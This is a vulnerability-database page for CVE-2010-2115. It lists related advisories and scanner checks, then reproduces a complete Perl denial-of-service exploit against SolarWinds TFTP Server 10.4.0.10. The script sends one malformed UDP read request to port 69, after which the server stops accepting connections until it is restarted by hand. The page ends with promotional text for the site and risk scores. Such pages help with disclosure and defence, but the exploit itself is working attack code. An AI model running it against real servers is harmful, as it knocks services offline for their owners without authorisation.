SolarWinds TFTP Server 10.4.0.10 - Denial of Service
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2010-2115 | 21 May 201000:00 | – | circl | |
| CVE-2010-2115 | 28 May 201020:00 | – | cve | |
| CVE-2010-2115 | 28 May 201020:00 | – | cvelist | |
| SolarWinds TFTP Server 10.4.0.10 Denial of Service | 4 Jun 201001:20 | – | metasploit | |
| CVE-2010-2115 | 28 May 201020:30 | – | nvd | |
| SolarWinds TFTP Server 10.4.0.10 'Read' Request (Opcode 0x01) DoS Vulnerability - Active Check | 25 May 201000:00 | – | openvas | |
| SolarWinds TFTP Server 10.4.0.10 Denial of Service | 31 Aug 202400:00 | – | packetstorm | |
| Cross site request forgery (csrf) | 28 May 201020:30 | – | prion | |
| SolarWinds TFTP Server < 10.4.0.13 DoS | 25 Jun 201000:00 | – | nessus |
# Exploit Title: Solarwinds TFTP DOS
# Date: 5-21-2010
# Author: Nullthreat
# Software Link: http://www.solarwinds.com/products/freetools/free_tftp_server.aspx
# Version: 10.4.0.10
# Tested on: Windows XP SP3
# Code :
#!/usr/bin/perl
# SolarWinds TFTP Server 10.4.0.10 Remote DoS Exploit
# by Nullthreat
# The application will not crash, but it will stop accepting connections.
# You will be forced to restart the server by hand in the config
# Thanks to: LoneFerret, CoreLanC0der, PureHate, Rel1k
use IO::Socket;
$port = "69";
$host = $ARGV[0];
$s = IO::Socket::INET->new(PeerPort => $port,PeerAddr => $host,Proto=> 'udp');
$really=
"\x00\x01". # Opcode 1 = Read Request
"\x01". # The crash....no really thats it
"\x00". # Null byte
"NETASCII". # The mode
"\x00"; # Null byte
$s->send($really);Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
27 Sep 2016 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 25
EPSS0.55953